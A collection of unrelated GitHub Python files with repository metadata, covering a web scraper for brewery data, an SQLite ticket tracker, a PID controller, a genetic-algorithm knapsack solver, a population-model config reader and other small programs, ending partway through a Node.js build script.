with open('input.txt') as program_file:
program = program_file.read().split(',')
program = list(map(lambda x: int(x), program))
execute(program)
if __name__ == "__main__":
main()
|
Sebastian-/advent-of-code-2019
|
day05/sol.py
|
sol.py
|
py
| 1,784 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73264632828
|
from game_objects.projectile import Projectile
from game_objects.player import Player
from pyglet import clock
from widgets.event_window import EventWindow
import pyglet
import cv2 as cv
import time
window = EventWindow(fullscreen=True)
# soul_image = pyglet.image.load('soul.png')
# soul = pyglet.sprite.Sprite(soul_image)
soul = Player(src='soul.png')
print(soul.width, soul.height)
print(window.width / 2, window.height / 2)
soul.move(window.width / 2 - soul.width, window.height / 2 - soul.height)
soul.scale = 1.3
print('Soul: ', soul.x, soul.y, soul.width, soul.height)
soul_np = cv.imread('soul.png')
projectile = Projectile(src='projectiles/dull_knife.png', speed=10, x=window.width * 0.7, y=window.height)
# projectile.x = window.width / 3
# projectile.rectangle.x = projectile.x
# projectile.y = window.height / 2
# projectile.rectangle.y = projectile.y
projectile.point(soul.x, soul.y)
@window.event
def on_draw():
window.clear()
projectile.draw()
soul.draw()
def move_forward(dt):
# projectile.forward()
# projectile.rotate(pi/180)
if soul.check_for_collision(projectile):
print('hit!',
projectile.get_left_bound(),
projectile.get_right_bound(),
soul.get_left_bound(),
)
clock.unschedule(move_forward)
start = time.time()
img1 = cv.imread('test_images/dull_knife.png')
img1 = projectile.np
# img2 = cv.imread('test_images/heart_not_overlapping_3.png')
img2 = cv.imread('test_images/heart_overlapping_2.png')
img1gray = cv.threshold(img1, 1, 255, cv.THRESH_BINARY)
if __name__ == '__main__':
pyglet.clock.schedule_interval(move_forward, 1 / 120)
pyglet.app.run()
|
KimPalao/Headshot
|
collision_test.py
|
collision_test.py
|
py
| 1,686 |
python
|
en
|
code
| 0 |
github-code
|
6
|
40176582534
|
#import gevent.monkey
#gevent.monkey.patch_all()
import os
import sys
import time
import pprint
import logging
import requests
import grequests
import threading
import urllib.parse
from bs4 import BeautifulSoup
import db
import parse
logger = logging.getLogger('scraper')
logger.setLevel(logging.DEBUG)
SRC_DIR = os.path.dirname(os.path.realpath(__file__))
LOG_DIR = os.path.join(SRC_DIR, "..", "log")
LOG_FILENAME = "scraper.log"
LOG_FILEPATH = os.path.join(LOG_DIR, LOG_FILENAME)
fh = logging.FileHandler(LOG_FILEPATH, mode='w')
fh.setLevel(logging.ERROR)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(funcName)s - %(lineno)d - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
# Set low so server isn't bombarded and begins to refuse.
MAX_SESSIONS = 1
domain = 'https://www.beeradvocate.com/'
places_rel_url = 'place/list/'
places_url = urllib.parse.urljoin(domain, places_rel_url)
places_params = {'start': 0, 'brewery': 'Y', 'sort': 'name'}
progress = {'breweries': 0, 'beers': 0, 'errors': 0}
def exception_handler(r, e):
progress['errors'] += 1
logger.error("REQUEST URL: {} EXCEPTION: {}".format(r.url, e))
logger.error("{} ERRORS HAVE OCCURRED".format(progress['errors']))
def get_last_page_start():
response = requests.get(url=places_url, params=places_params)
soup = BeautifulSoup(response.text, features='lxml')
last_page_tag = soup.find('a', text="last")
last_link = last_page_tag['href']
parsed = urllib.parse.urlparse(last_link)
last_start_str = urllib.parse.parse_qs(parsed.query)['start'][0]
last_start = int(last_start_str)
logging.debug("get_last_page_start: last_start: {}".format(last_start))
return last_start
def get_breweries():
STEP = 20
last_page_start = get_last_page_start()
reqs = []
for start in range(0, last_page_start, STEP):
params = places_params.copy()
params['start'] = start
reqs.append(grequests.get(places_url, params=params, callback=get_breweries_handler))
logger.info("STARTING THREADS to fetch brewery details.")
res = grequests.map(reqs, size=MAX_SESSIONS, exception_handler=exception_handler)
def get_breweries_handler(response, *args, **kwargs):
soup = BeautifulSoup(response.text, features='lxml')
this_page_breweries = parse.places.breweries(soup)
logger.info("this_page_breweries: {}".format(pprint.pformat(this_page_breweries)))
logger.info("response time (s): {}".format(response.elapsed))
db.breweries.extendleft(this_page_breweries)
progress['breweries'] += len(this_page_breweries)
logger.info("FETCHED: {} breweries.".format(progress['breweries']))
def get_brewery_details(paths):
params = {'view': 'beers', 'show': 'all'}
reqs = []
for p in paths:
url = urllib.parse.urljoin(domain, p)
reqs.append(grequests.get(url, params=params,
callback=get_brewery_details_handler))
logger.info("STARTING THREADS to fetch brewery details.")
res = grequests.map(reqs, size=MAX_SESSIONS, exception_handler=exception_handler)
def get_brewery_details_handler(response, *args, **kwargs):
logger.info("RESPONSE received from {}".format(response.url))
soup = BeautifulSoup(response.text, features='lxml')
#############################################################################
# This is possibly redundant as all this information can be gathered in the
# previous operation when the links are fetched from places list.
brewery = {}
brewery['id'] = parse.url.brewery_id(response.url)
brewery['name'] = parse.brewery.name(soup)
db.breweries.appendleft(brewery)
logger.info("ADDED brewery {} to write queue.".format(pprint.pformat(brewery)))
#############################################################################
this_brewery_beers = parse.brewery.beers(soup)
db.beers.extendleft(this_brewery_beers)
logger.info("ADDED {} beers to write queue.".format(len(this_brewery_beers)))
progress['breweries'] += 1
progress['beers'] += len(this_brewery_beers)
logger.info("FETCHED: {} breweries and {} beers.".format(progress['breweries'], progress['beers']))
time.sleep(1)
def get_beer_details(paths):
# This function is redundant when first populating tha database as all info
# can be extracted from the brewery profile page (except ranking which can be
# calculated from scores stored in the database. It is useful to update the
# info for beers already in the database but even when updating the previous
# operation of fetching the brewery has most likely been performed anyway.
reqs = []
for p in paths:
url = urllib.parse.urljoin(domain, p)
reqs.append(grequests.get(url, allow_redirects=True, callback=get_beer_details_handler))
logger.info("STARTING THREADS to fetch beer details.")
res = grequests.map(reqs, size=MAX_SESSIONS, exception_handler=exception_handler)
def get_beer_details_handler(response, *args, **kwargs):
print(response.status_code)
print(response.url)
soup = BeautifulSoup(response.text, features='lxml')
print(soup)
beer = {}
beer['id'] = parse.url.beer_id(response.url)
beer['brewery_id'] = parse.url.brewery_id(response.url)
beer['name'] = parse.beer.name(soup)
logger.info("name: {}".format(beer['name']))
beer['score'] = parse.beer.score(soup)
logger.info("score: {}".format(beer['score']))
beer['ratings'] = parse.beer.ratings(soup)
logger.info("ratings: {}".format(beer['ratings']))
beer['ranking'] = parse.beer.ranking(soup)
logger.info("ranking: {}".format(beer['ranking']))
beer['style'] = parse.beer.style(soup)
logger.info("style: {}".format(beer['style']))
beer['abv'] = parse.beer.abv(soup)
logger.info("abv: {}".format(beer['abv']))
db.beers.appendleft(beer)
logger.info("ADDED beer with ID = {} to write queue.".format(beer['id']))
def breweries():
consumer_thread = threading.Thread(target=db.consumer)
consumer_thread.start()
get_breweries()
db.fetching_breweries = False
consumer_thread.join()
def brewery_details():
to_fetch = db.read_brewery_ids()
logger.info("{} breweries to fetch".format(len(to_fetch)))
paths = ["/beer/profile/{}/".format(b) for b in to_fetch]
consumer_thread = threading.Thread(target=db.consumer)
consumer_thread.start()
get_brewery_details(paths)
db.fetching_breweries = False
consumer_thread.join()
def beer_details():
to_fetch = db.read_beer_ids()
logger.info("{} beers to fetch".format(len(to_fetch)))
paths = ["/beer/profile/{}/{}".format(b[0], b[1]) for b in to_fetch]
consumer_thread = threading.Thread(target=db.consumer)
consumer_thread.start()
get_beer_details(paths[0:1])
db.fetching_breweries = False
consumer_thread.join()
def print_usage():
print("USAGE: python3 scraper.py {breweries|brewery_details|beer_details}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print_usage()
elif len(sys.argv) == 2 and sys.argv[1] == "brewery_details":
brewery_details()
elif len(sys.argv) == 2 and sys.argv[1] == "breweries":
breweries()
elif len(sys.argv) == 2 and sys.argv[1] == "beer_details":
beer_details()
else:
print_usage()
|
JohnMcAninley/beer-goggles
|
scraper/src/scraper.py
|
scraper.py
|
py
| 7,113 |
python
|
en
|
code
| 0 |
github-code
|
6
|
41095556533
|
import sqlite3
conn = sqlite3.connect("tickets5.db")
cur = conn.cursor()
def displayAllTickets():
sql = "SELECT * FROM tickets"
cur.execute(sql)
results = cur.fetchall()
if results:
printStuff(results)
else:
print("No data found")
print()
def addTicket():
actual_speed = int(input("Enter actual speed: "))
posted_speed = int(input("Enter posted speed: "))
age = int(input("Enter age of offender: "))
violator_sex = str(input("Enter sex of offender: "))
data = (None, actual_speed, posted_speed, age, violator_sex)
sql = "INSERT INTO tickets VALUES (?, ?, ?, ?, ?)"
cur.execute(sql, data)
conn.commit()
def displayTicketsByOffender():
violator_sex = input("Enter sex of offender: ")
data = (violator_sex, )
sql = "SELECT * FROM tickets WHERE violator_sex = ?"
cur.execute(sql, data)
results = cur.fetchall()
if results:
printStuff(results)
else:
print("Name not found")
print()
def printStuff(data):
print("%-10s %-12s %-10s %-5s %-12s " % ("ticketID", "Posted MPH", "MPH Over", "Age", "Violator Sex"))
for row in data:
over = row[1] - row[2]
print(" %-10d %-12d %-10d %-5d %-12s " % (row[0], row[1], over, row[3], row[4]))
print()
def main():
while True:
print("""
Menu options. Choose 1, 2, 3, or 4:
1. Display all Tickets
2. Add a Ticket
3. Filter by Offender Sex
4. Save & Exit
""")
opt = input("Enter your choice, 1, 2, 3, or 4: ")
if opt == "1":
displayAllTickets()
elif opt == "2":
addTicket()
elif opt == "3":
displayTicketsByOffender()
elif opt == "4":
print()
print("Goodbye")
if conn:
conn.close
break
else:
print("Invalid entry, please re-enter your choice")
print()
main()
|
LilGotit/brain-drizzle
|
TicketsDatabase/ticketDatabase.py
|
ticketDatabase.py
|
py
| 2,130 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43627424884
|
from typing import List
class Solution:
def numOfMinutes(self, n: int, headID: int, manager: List[int], informTime: List[int]) -> int:
employees = {}
for i, m in enumerate(manager):
if i != headID:
employees[m] = employees.get(m, []) + [i]
queue = [[headID, informTime[headID]]]
res = 0
while queue:
node, time = queue.pop(0)
for empl in employees.get(node, []):
empl_time = time+informTime[empl]
res = max(res, empl_time)
queue.append([empl, empl_time])
return res
def test(self):
test_cases = [
[1, 0, [-1], [0]],
[6, 2, [2, 2, -1, 2, 2, 2], [0, 0, 1, 0, 0, 0]],
[7, 6, [1,2,3,4,5,6,-1], [0,6,5,4,3,2,1]],
[4, 2, [3,3,-1,2], [0,0,162,914]],
[15, 0, [-1,0,0,1,1,2,2,3,3,4,4,5,5,6,6], [1,1,1,1,1,1,1,0,0,0,0,0,0,0,0]],
[11, 4, [5,9,6,10,-1,8,9,1,9,3,4], [0,213,0,253,686,170,975,0,261,309,337]],
]
for n, headID, manager, informTime in test_cases:
res = self.numOfMinutes(n, headID, manager, informTime)
print('res: %s' % res)
print('-='*30 + '-')
if __name__ == '__main__':
Solution().test()
|
MichaelTQ/LeetcodePythonProject
|
solutions/leetcode_1351_1400/LeetCode1376_TimeNeededToInformAllEmployees.py
|
LeetCode1376_TimeNeededToInformAllEmployees.py
|
py
| 1,290 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42535314476
|
# OKANCAN COSAR
# 12253018
import Helper
import Constant
import Step
import sys
populasyon = []
def Calculate(populasyonlar):
# for i in Helper.populasyonDict(populasyonlar):
# # guzel yazdirma
# ff = ""
# for ix in i[0]:
# ff = ff + str(ix)
# print("(", ff, "),", i[1])
# # guzel yazdirma sonu
# Ebeveynleri sec (PARENT SELECT)
parents = Step.parentSelect(populasyonlar)
# Ebeveynleri caprazla (RECOMBINE) ve yavrulari mutasyona tabi tut (MUTATE)
# (Offsprings(Cocuklar))
cocuklar = Step.recombineAndMutate(parents)
# Degerlerini hesaplayip dictionary yapar.
# sort'laryip ilk 50 yi dondurur
populasyonlarx = Step.survivalSelect(cocuklar + populasyonlar)
return populasyonlarx
def main():
global populasyon
# Bitis kosulu saglanana kadar TEKRARLA(REPEAT)
for iterasyon in range(Constant.ITERASYONSAYISI):
# print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Generation: " + str(iterasyon) + " <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
if iterasyon == 0:
# Baslangic populasyonunu rastgele olustur (INITIALISE)
populasyon = Step.Initialise()
populasyon = Calculate(populasyon)
# elif iterasyon == Constant.ITERASYONSAYISI-1:
# print("\n\nFinal Population:")
# # guzel yazdirma
# ff = ""
# for ix in Helper.populasyonDict(populasyon):
# ff = ff + str(ix) + "\n"
# print(ff)
# # guzel yazdirma sonu
else:
populasyon = Calculate(populasyon)
from datetime import datetime
if __name__ == '__main__':
# f = open("out.txt", "w")
# sys.stdout = f
a = datetime.now().microsecond * 0.001
main()
b = datetime.now().microsecond * 0.001
print(b - a)
|
OkancanCosar/01-Knapsack-with-GA
|
python/index.py
|
index.py
|
py
| 1,827 |
python
|
tr
|
code
| 2 |
github-code
|
6
|
69817132988
|
#!/usr/bin/env python3
class PIDController:
"""
"""
def __init__(self, kp, ki, kd, dt):
self.__kp = kp # Proportional weight.
self.__ki = ki # Integral weight.
self.__kd = kd # Differential weight.
self.__dt = dt # Time interval.
self.__error_prev = None # Previous calculated error.
self.__error_integrate = 0 # Controller error.
self.output_list = [0, 0, 0] # Controller output list.
self.output_sum = 0 # Controller output value.
"""
@fn step
@brief
"""
def step(self, err):
# Calculate the errors of the controller.
error = err
self.__error_integrate += error
if self.__error_prev is None:
error_differential = 0.0
else:
error_differential = (error - self.__error_prev) / self.__dt
self.__error_prev = error
# Controller components.
proportional = self.__kp * error
integral = self.__ki * self.__error_integrate
differential = self.__kd * error_differential
# Assign and calculate outputs for the controller.
self.output_list = [proportional, integral, differential]
self.output_sum = sum(self.output_list)
|
derekdecost/Differential-Drive-Robot
|
packages/pid_controller/src/pid_controller.py
|
pid_controller.py
|
py
| 1,392 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26531291291
|
from pyhpecfm import system
from lib.actions import HpecfmBaseAction
class eventLookup(HpecfmBaseAction):
def run(self):
cfm_audits = system.get_audit_logs(self.client)
if isinstance(cfm_audits, list):
# Create a empty list for alarms
event_data = []
# Loop through cfm_audits and process EVENTS
for event in cfm_audits:
typex = event['record_type']
if typex == 'EVENT':
# Build dictionary to add to list
out = {
'u_eventType': event['data']['event_type'],
'u_typex': event['record_type'],
'u_sev': event['severity'],
'u_uuid': event['uuid'],
'u_desc': event['description'],
'u_name' : event['data']['object_name'],
'u_typeo' : event['data']['object_type']
}
event_data.append(out)
return (True, event_data)
return (False, cfm_audits)
|
HewlettPackard/stackstorm-hpe-cfm
|
actions/get_events.py
|
get_events.py
|
py
| 1,125 |
python
|
en
|
code
| 1 |
github-code
|
6
|
10251411217
|
"""
Configuration reader for the population_gravity model
@author Chris R. Vernon
@email: [email protected]
License: BSD 2-Clause, see LICENSE and DISCLAIMER files
"""
import datetime
import os
import simplejson
import rasterio
import yaml
import pandas as pd
import population_gravity.downscale_utilities as utils
class ReadConfig:
"""Read configuration data either provided in the configuration YAML file or as passed in via arguments.
:param config_file: string. Full path to configuration YAML file with file name and
extension. If not provided by the user, the code will default to the
expectation of alternate arguments.
:param grid_coordinates_file: string. Full path with file name and extension to the CSV file
containing the coordinates for each 1 km grid cell within the target
state. File includes a header with the fields XCoord, YCoord, FID.
Where data types and field descriptions are as follows:
(XCoord, float, X coordinate in meters),
(YCoord, float, Y coordinate in meters),
(FID, int, Unique feature id)
:param historical_suitability_raster: string. Full path with file name and extension to the suitability
raster containing values from 0.0 to 1.0 for each 1 km grid cell
representing suitability depending on topographic and land use and
land cover characteristics within the target state.
:param base_rural_pop_raster: string. Full path with file name and extension to a raster containing
rural population counts for each 1 km grid cell for the historical
base time step.
:param base_urban_pop_raster: string. Full path with file name and extension to a raster containing
urban population counts for each 1 km grid cell for the historical
base time step.
:param projected_population_file: string. Full path with file name and extension to a CSV file containing
population projections per year separated into urban and rural
categories. Field descriptions for require fields as follows:
(Year, integer, four digit year),
(UrbanPop, float, population count for urban),
(RuralPop, float, population count for rural),
(Scenario, string, scenario as set in the `scenario` variable)
:param one_dimension_indices_file: string. Full path with file name and extension to the text file
containing a file structured as a Python list (e.g. [0, 1]) that
contains the index of each grid cell when flattened from a 2D array to
a 1D array for the target state.
:param output_directory: string. Full path with file name and extension to the output directory
where outputs and the log file will be written.
:param alpha_urban: float. Alpha parameter for urban. Represents the degree to which the
population size of surrounding cells translates into the suitability
of a focal cell. A positive value indicates that the larger the
population that is located within the 100 km neighborhood, the more
suitable the focal cell is. More negative value implies less suitable.
Acceptable range: -2.0 to 2.0
:param beta_urban: float. Beta parameter for urban. Reflects the significance of distance
to surrounding cells on the suitability of a focal cell. Within 100 km,
beta determines how distance modifies the effect on suitability.
Acceptable range: -0.5 to 2.0
:param alpha_rural: float. Alpha parameter for rural. Represents the degree to which the
population size of surrounding cells translates into the suitability
of a focal cell. A positive value indicates that the larger the
population that is located within the 100 km neighborhood, the more
suitable the focal cell is. More negative value implies less suitable.
Acceptable range: -2.0 to 2.0
:param beta_rural: float. Beta parameter for rural. Reflects the significance of distance
to surrounding cells on the suitability of a focal cell. Within 100 km,
beta determines how distance modifies the effect on suitability.
Acceptable range: -0.5 to 2.0
:param scenario: string. String representing the scenario with no spaces. Must match
what is in the `projected_population_file` if passing population
projections in using a file.
:param state_name: string. Target state name with no spaces separated by an underscore.
:param historic_base_year: int. Four digit historic base year.
:param projection_year: int. Four digit first year to process for the projection.
:param projection_end_year: int. Four digit last year to process for the projection.
:param time_step: int. Number of steps (e.g. number of years between projections)
:param rural_pop_proj_n: float. Rural population projection count for the projected year being
calculated. These can be read from the `projected_population_file`
instead.
:param urban_pop_proj_n: float. Urban population projection count for the projected year being
calculated. These can be read from the `projected_population_file`
instead.
:param calibration_urban_year_one_raster: string. Only used for running calibration. Full path with file name and
extension to a raster containing urban population counts for each 1 km
grid cell for year one of the calibration.
:param calibration_urban_year_two_raster: string. Only used for running calibration. Full path with file name and
extension to a raster containing urban population counts for each 1 km
grid cell for year two of the calibration.
:param calibration_rural_year_one_raster: string. Only used for running calibration. Full path with file name and
extension to a raster containing rural population counts for each 1 km
grid cell for year one of the calibration.
:param calibration_rural_year_two_raster: string. Only used for running calibration. Full path with file name and
extension to a raster containing rural population counts for each 1 km
grid cell for year two of the calibration.
:param kernel_distance_meters: float. Distance kernel in meters; default 100,000 meters.
:param write_raster: boolean. Optionally export raster output; Default True
:param write_csv: boolean. Optionally export raster as a CSV file without nodata values
:param write_array2d: boolean. Optionally export a NumPy 2D array for each output in the shape
of the template raster
:param write_array1d: boolean. Optionally export a Numpy 1D flattened array of only grid cells
within the target state
:param run_number: int. Add on for the file name when running sensitivity analysis
:param write_logfile: boolean. Optionally write log to file.; Default True
:param compress_csv: boolean. Optionally compress CSV file to GZIP if outputting in CSV
:param output_total: boolean. Choice to output total (urban + rural) dataset; Defualt True
"""
# format for datetime string
DATETIME_FORMAT = '%Y-%m-%d_%Hh%Mm%Ss'
# key names from YAML config file
OUT_DIR_KEY = 'output_directory'
START_STEP_KEY = 'start_step'
THROUGH_STEP_KEY = 'through_step'
ALPHA_KEY = 'alpha_param'
BETA_KEY = 'beta_param'
# definition of acceptable range of values for parameters
MAX_PARAM_VALUE = 10.0
MIN_PARAM_VALUE = -10.0
def __init__(self, config_file=None, grid_coordinates_file=None, historical_suitability_raster=None,
base_rural_pop_raster=None, base_urban_pop_raster=None, projected_population_file=None,
one_dimension_indices_file=None, output_directory=None, alpha_urban=None, beta_urban=None,
alpha_rural=None, beta_rural=None, scenario=None, state_name=None, historic_base_year=None,
projection_year=None, rural_pop_proj_n=None,
urban_pop_proj_n=None, calibration_urban_year_one_raster=None, calibration_urban_year_two_raster=None,
calibration_rural_year_one_raster=None, calibration_rural_year_two_raster=None,
kernel_distance_meters=None, write_raster=True, write_csv=False, write_array1d=False,
write_array2d=False, run_number='', write_logfile=True, compress_csv=True, output_total=True,
write_suitability=False, pass_one_alpha_upper=1.0, pass_one_alpha_lower=-1.0,
pass_one_beta_upper=1.0, pass_one_beta_lower=0.0, pass_two_alpha_upper=2.0, pass_two_alpha_lower=-2.0,
pass_two_beta_upper=2.0, pass_two_beta_lower=-0.5, brute_n_alphas=10, brute_n_betas=5):
self._config_file = config_file
self._alpha_urban = alpha_urban
self._alpha_rural = alpha_rural
self._beta_urban = beta_urban
self._beta_rural = beta_rural
self._kernel_distance_meters = kernel_distance_meters
self._output_directory = output_directory
self.grid_coordinates_file = self.validate_file(grid_coordinates_file)
self.grid_coordinates_array = self.get_grid_coordinates_array()
# Full path with file name and extension to the suitability raster containing values from 0.0 to 1.0
# for each 1 km grid cell representing suitability depending on topographic and land use and land cover
# characteristics within the target state.
self.historical_suitability_raster = self.validate_file(historical_suitability_raster)
self.base_rural_pop_raster = self.validate_file(base_rural_pop_raster)
self.base_urban_pop_raster = self.validate_file(base_urban_pop_raster)
self._projected_population_file = projected_population_file
self._one_dimension_indices_file = one_dimension_indices_file
# Target scenario name
self.scenario = scenario.lower()
# Target state name
self.state_name = state_name.lower()
# Four digit historic base year
self.historic_base_year = self.validate_step(historic_base_year, 'historic_base_year')
# Four digit first year to process for the projection
self.projection_year = self.validate_step(projection_year, 'projection_year')
self._rural_pop_proj_n = rural_pop_proj_n
self._urban_pop_proj_n = urban_pop_proj_n
# Optionally save outputs to a raster
self.write_raster = write_raster
# Optionally export raster as a CSV file without nodata values; option set to compress CSV using gzip.
# Exports values for non-NODATA grid cells as field name `value`
self.write_csv = write_csv
# Optionally save outputs to a 1D array for cells within the target state
self.write_array1d = write_array1d
# Optionally save outputs to a 1D array for cells within the target state
self.write_array2d = write_array2d
# An integer add on for the file name when running sensitivity analysis
self.run_number = run_number
# Optionally write log outputs to a file
self.write_logfile = write_logfile
# Compress CSV to GZIP option
self.compress_csv = compress_csv
# Choice to output total dataset (urban + rural)
self.output_total = output_total
self.write_suitability = write_suitability
# specific to calibration run
self.calibration_urban_year_one_raster = calibration_urban_year_one_raster
self.calibration_urban_year_two_raster = calibration_urban_year_two_raster
self.calibration_rural_year_one_raster = calibration_rural_year_one_raster
self.calibration_rural_year_two_raster = calibration_rural_year_two_raster
self.pass_one_alpha_upper = pass_one_alpha_upper
self.pass_one_alpha_lower = pass_one_alpha_lower
self.pass_one_beta_upper = pass_one_beta_upper
self.pass_one_beta_lower = pass_one_beta_lower
self.pass_two_alpha_upper = pass_two_alpha_upper
self.pass_two_alpha_lower = pass_two_alpha_lower
self.pass_two_beta_upper = pass_two_beta_upper
self.pass_two_beta_lower = pass_two_beta_lower
self.brute_n_alphas = brute_n_alphas
self.brute_n_betas = brute_n_betas
# get a copy of the raster metadata from a states input raster
self.template_raster_object, self.metadata = utils.get_raster_with_metadata(self.historical_suitability_raster)
# import population projection file if exists
self.df_projected = self.process_df_projected()
# Get a bounding box from the historical raster
self.bbox = utils.create_bbox(self.template_raster_object)
# Get a current time in a string matching the specified datetime format
self.date_time_string = datetime.datetime.now().strftime(self.DATETIME_FORMAT)
# Convenience wrapper for the DATETIME_FORMAT class attribute
self.datetime_format = self.DATETIME_FORMAT
# Validate output directory
self.output_directory = self.set_output_directory()
# Full path with file name and extension to the logfile
self.logfile = os.path.join(self.output_directory, f'logfile_{self.scenario}_{self.state_name}_{self.date_time_string}.log')
@property
def alpha_urban(self):
"""Alpha urban parameter for model."""
return self.validate_parameter(self._alpha_urban, 'alpha_urban')
@alpha_urban.setter
def alpha_urban(self, value):
"""Setter for alpha urban parameter."""
self._alpha_urban = self.validate_parameter(value, 'alpha_urban')
@property
def alpha_rural(self):
"""Alpha rural parameter for model."""
return self.validate_parameter(self._alpha_rural, 'alpha_rural')
@alpha_rural.setter
def alpha_rural(self, value):
"""Setter for alpha rural parameter."""
self._alpha_rural = self.validate_parameter(value, 'alpha_rural')
@property
def beta_urban(self):
"""Beta urban parameter for model."""
return self.validate_parameter(self._beta_urban, 'beta_urban')
@beta_urban.setter
def beta_urban(self, value):
"""Setter for beta urban parameter."""
self._beta_urban = self.validate_parameter(value, 'beta_urban')
@property
def beta_rural(self):
"""Beta rural parameter for model."""
return self.validate_parameter(self._beta_rural, 'beta_rural')
@beta_rural.setter
def beta_rural(self, value):
"""Setter for beta rural parameter."""
self._beta_rural = self.validate_parameter(value, 'beta_rural')
@property
def kernel_distance_meters(self):
"""Distance kernel in meters; default 100,000 meters."""
return self.validate_float(self._kernel_distance_meters)
@kernel_distance_meters.setter
def kernel_distance_meters(self, value):
"""Setter for kernel_distance_meters."""
self._kernel_distance_meters = value
def process_df_projected(self):
"""From population projection file if exists."""
if (self.urban_pop_proj_n is None) and (self.rural_pop_proj_n is None):
df = pd.read_csv(self.projected_population_file)
# make header lower case
df.columns = [i.lower() for i in df.columns]
# make scenario column lower case
df['scenario'] = df['scenario'].str.lower()
return df
else:
return None
def set_output_directory(self):
"""Validate output directory."""
if self.config is None:
return self.validate_directory(self._output_directory)
else:
key = self.validate_key(self.config, self.OUT_DIR_KEY)
return self.validate_directory(key)
@property
def historical_suitability_2darray(self):
"""Read in historical suitability mask as an array"""
return utils.raster_to_array(self.historical_suitability_raster)
@property
def historical_suitability_array(self):
"""Flatten historical suitability array."""
return self.historical_suitability_2darray.flatten()
@property
def df_indicies(self):
"""Build data frame in the shape of the raster array."""
return utils.all_index_retriever(self.historical_suitability_2darray, ["row", "column"])
@property
def one_dimension_indices_file(self):
"""File that describe grid indices of points that fall within the state boundary."""
return self.validate_file(self._one_dimension_indices_file)
@property
def one_dimension_indices(self):
"""Grid indices for the state to an array."""
with open(self.one_dimension_indices_file, 'r') as r:
return simplejson.load(r)
def get_grid_coordinates_array(self):
"""Grid coordinates to array."""
# return np.genfromtxt(self.grid_coordinates_file, delimiter=',', skip_header=1, usecols=(0, 1, 2), dtype=float)
df = pd.read_csv(self.grid_coordinates_file)
df.sort_values('FID', inplace=True)
df.set_index('FID', drop=False, inplace=True)
df.index.name = None
df = df[['XCoord', 'YCoord', 'FID']].copy()
return df.values
@property
def urban_pop_proj_n(self):
"""Urban population projection count for the projected year being calculated. These can be read from
the `projected_population_file` instead.
"""
return self.validate_float(self._urban_pop_proj_n)
@property
def rural_pop_proj_n(self):
"""Rural population projection count for the projected year being calculated. These can be read from
the `projected_population_file` instead.
"""
return self.validate_float(self._rural_pop_proj_n)
@property
def projected_population_file(self):
"""Full path with file name and extension to a CSV file containing population projections per year
separated into urban and rural categories.
"""
return self.validate_file(self._projected_population_file)
@property
def config(self):
"""Read the YAML config file object"""
if self._config_file is None:
return None
else:
with open(self._config_file, 'r') as yml:
return yaml.load(yml)
@property
def template_raster(self):
"""Generate template raster specifications.
:return: [0] 2D array of template raster values
[1] 1D flattened array
[2] row count
[3] column count
[4] profile
"""
with rasterio.open(self.historical_suitability_raster) as src_raster:
profile = src_raster.profile
array2d = src_raster.read(1)
row_count = array2d.shape[0]
col_count = array2d.shape[1]
array1d = array2d.flatten()
return array2d, array1d, row_count, col_count, profile
def validate_parameter(self, param, key):
"""Validate parameter existence and range.
:param param: Parameter value
:type param: float
:param key: Configuration key from YAML file
:type key: str
:return: int; parameter
"""
if self.config is None:
is_float = self.validate_float(param)
return self.validate_range(is_float)
else:
is_key = self.validate_key(self.config, key)
is_float = self.validate_float(is_key)
return self.validate_range(is_float)
def validate_range(self, value):
"""Ensure value falls within an acceptable range."""
if (value >= self.MIN_PARAM_VALUE) and (value <= self.MAX_PARAM_VALUE):
return value
else:
raise ValueError(f"Parameter value '{value}' is not within the valid range of {self.MIN_PARAM_VALUE} - {self.MAX_PARAM_VALUE}.")
@staticmethod
def validate_float(val):
"""Ensure parameter value is type float"""
if val is not None:
try:
return float(val)
except TypeError:
raise TypeError(f"Parameter value '{val}' is not a float.")
else:
return None
@staticmethod
def validate_directory(directory):
"""Validate directory to ensure it exists.
:param directory: Full path to the target directory.
:type directory: str
:return: Full path of a valid directory
"""
if (directory is not None) and (os.path.isdir(directory)):
return directory
elif (directory is not None) and (os.path.isdir(directory is False)):
raise NotADirectoryError(f"Directory: {directory} does not exist.")
else:
return None
@staticmethod
def validate_file(file):
"""Validate file to ensure it exists.
:param file: Full path to the target file.
:type file: str
:return: Full path of a valid file
"""
if (file is not None) and (os.path.isfile(file)):
return file
elif (file is not None) and (os.path.isfile(file) is False):
raise FileNotFoundError(f"File: {file} does not exist.")
else:
return None
def validate_step(self, step, key):
"""Validate step existence and value.
:param step: Time step value
:type step: int
:param key: Configuration key from YAML file
:type key: str
:return: int; time step
"""
if self.config is None:
return self.validate_int(step)
else:
is_key = self.validate_key(self.config, key)
return self.validate_int(is_key)
@staticmethod
def validate_int(n):
"""Ensure time step is type int"""
if n is not None:
try:
return int(n)
except TypeError:
raise TypeError(f"Value '{n}' is not an integer.")
else:
return None
@staticmethod
def validate_key(yaml_object, key):
"""Check to see if key is in YAML file, if not return None.
:param yaml_object: YAML object for the configuration file
:param key: Target key name from the configuration file.
:type key: str
:return: Value from configuration file matching the key. If no key present,
return None.
"""
try:
return yaml_object[key]
except KeyError:
return None
@staticmethod
def get_yaml(config_file):
"""Read the YAML config file
:param config_file: Full path with file name and extension to the input config.yml file
:return: YAML config object
"""
with open(config_file, 'r') as yml:
return yaml.load(yml)
|
IMMM-SFA/population_gravity
|
population_gravity/read_config.py
|
read_config.py
|
py
| 26,485 |
python
|
en
|
code
| 4 |
github-code
|
6
|
7206670163
|
assert __name__ == "__main__"
import sys
import os
import subprocess
import shutil
from . import config
os.chdir('node-{}'.format(config.nodeVersion))
configureArgvs = config.configFlags
if config.nodeTargetConfig == 'Debug':
configureArgvs = configureArgvs + ['--debug-nghttp2', '--debug-lib']
if sys.platform == 'win32':
env = os.environ.copy()
env['config_flags'] = ' '.join(configureArgvs)
if config.nodeTargetConfig == 'Release':
print("==============BUILDING RELEASE LIBRARIES=================")
subprocess.check_call(
